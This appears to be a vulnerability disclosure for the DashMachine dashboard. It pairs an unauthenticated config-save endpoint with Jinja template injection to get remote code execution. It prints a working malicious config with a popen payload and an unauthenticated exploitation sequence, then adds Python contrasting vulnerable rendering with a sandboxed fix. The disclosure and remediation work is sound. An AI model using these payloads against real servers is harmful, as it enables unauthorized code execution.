Project link

rmountjoy92/DashMachine (https://github.com/rmountjoy92/DashMachine): Another web application bookmark dashboard, with fun features.

Affected versions

0.5-4 (Docker image)

Vulnerability details

When a data source is configured, DashMachine renders its value_template with Jinja template syntax, so a malicious template leads to remote code execution (server-side template injection). DashMachine also has an access-control flaw: an attacker can write the configuration without being logged in. Combined, the two give unauthenticated RCE.

Craft the malicious configuration (the __subclasses__() index used in value_template below is specific to the Python interpreter shipped in the affected image; on another build, enumerate __subclasses__() first to find a class whose __init__ globals expose popen):

[Settings]
theme = light
accent = orange
background = None
roles = admin,user,public_user
home_access_groups = admin_only
settings_access_groups = admin_only
custom_app_title = DashMachi
sidebar_default = open

[admin]
role = admin
password = 
confirm_password = 

[variable_name]
platform = curl
resource = http://example.com
value_template = {{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('id').read()}}{{value}}
response_type = plain

Without logging in, submit this malicious configuration to "/settings/save_config":


DashMachine responds "success", and the data source is assigned id 1.

Still without logging in, request "/load_data_source?id=1", where the id parameter is the value returned in the previous response:


DashMachine's response body contains the output of the injected command, confirming code execution.
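As an added example (not code from the page or from the DashMachine project), the following Python shows why a user-controlled value_template executes code under plain Jinja2 rendering, and how rendering the same template in Jinja2's immutable sandbox stops it while leaving legitimate templating working. It assumes, as the page's {{value}} placeholder suggests, that the fetched resource is bound to a template variable named value. The config text is constructed here in the shape of the page's [variable_name] section; instead of the page's interpreter-specific __subclasses__()[132] payload it reaches os through Jinja2's default global cycler, which is an assumption about Jinja2's default namespace rather than anything the page states.

```python
"""Added example, not DashMachine's own code: user-controlled value_template
under plain Jinja2 rendering (RCE) versus the immutable sandbox (blocked).
Assumption: the fetched value is bound to the template variable `value`."""
import configparser

from jinja2 import Template
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Constructed data-source section in the shape of the page's [variable_name] block.
# The page's payload indexes __subclasses__()[132], which depends on the interpreter;
# cycler.__init__.__globals__ reaches the `os` module imported by jinja2.utils without
# guessing an index (assumption: `cycler` is in Jinja2's default template globals).
MALICIOUS_CONFIG = """\
[variable_name]
platform = curl
resource = http://example.com
value_template = {{ cycler.__init__.__globals__.os.popen('echo pwned').read() }}{{value}}
response_type = plain
"""

# A template a legitimate user might write; must keep working after hardening.
BENIGN_TEMPLATE = "{{ value | upper }}"


def value_template_from_config(config_text, section="variable_name"):
    """Pull value_template out of an INI config the way a dashboard would."""
    cp = configparser.ConfigParser(interpolation=None)  # '%' must not be special here
    cp.read_string(config_text)
    return cp[section]["value_template"]


def render_vulnerable(template_source, fetched_value):
    """Vulnerable pattern: jinja2.Template built from attacker-controlled source.
    The template can walk Python internals, so {{ ... }} becomes arbitrary code."""
    return Template(template_source).render(value=fetched_value)


def render_sandboxed(template_source, fetched_value):
    """Hardened pattern: the immutable sandbox refuses underscore-prefixed attributes
    such as __init__ and __globals__, raising SecurityError before anything runs."""
    env = ImmutableSandboxedEnvironment(autoescape=False)
    try:
        return env.from_string(template_source).render(value=fetched_value)
    except SecurityError as exc:
        return f"blocked: {exc}"


if __name__ == "__main__":
    tpl = value_template_from_config(MALICIOUS_CONFIG)
    print(repr(render_vulnerable(tpl, "42")))          # command output, then the value
    print(render_sandboxed(tpl, "42"))                 # blocked: access to attribute ...
    print(render_sandboxed(BENIGN_TEMPLATE, "hello"))  # HELLO
```

The sandbox only closes the template-injection half of the chain; the unauthenticated write to /settings/save_config still needs a login check in front of the handler, otherwise an attacker can still overwrite every other setting in the config.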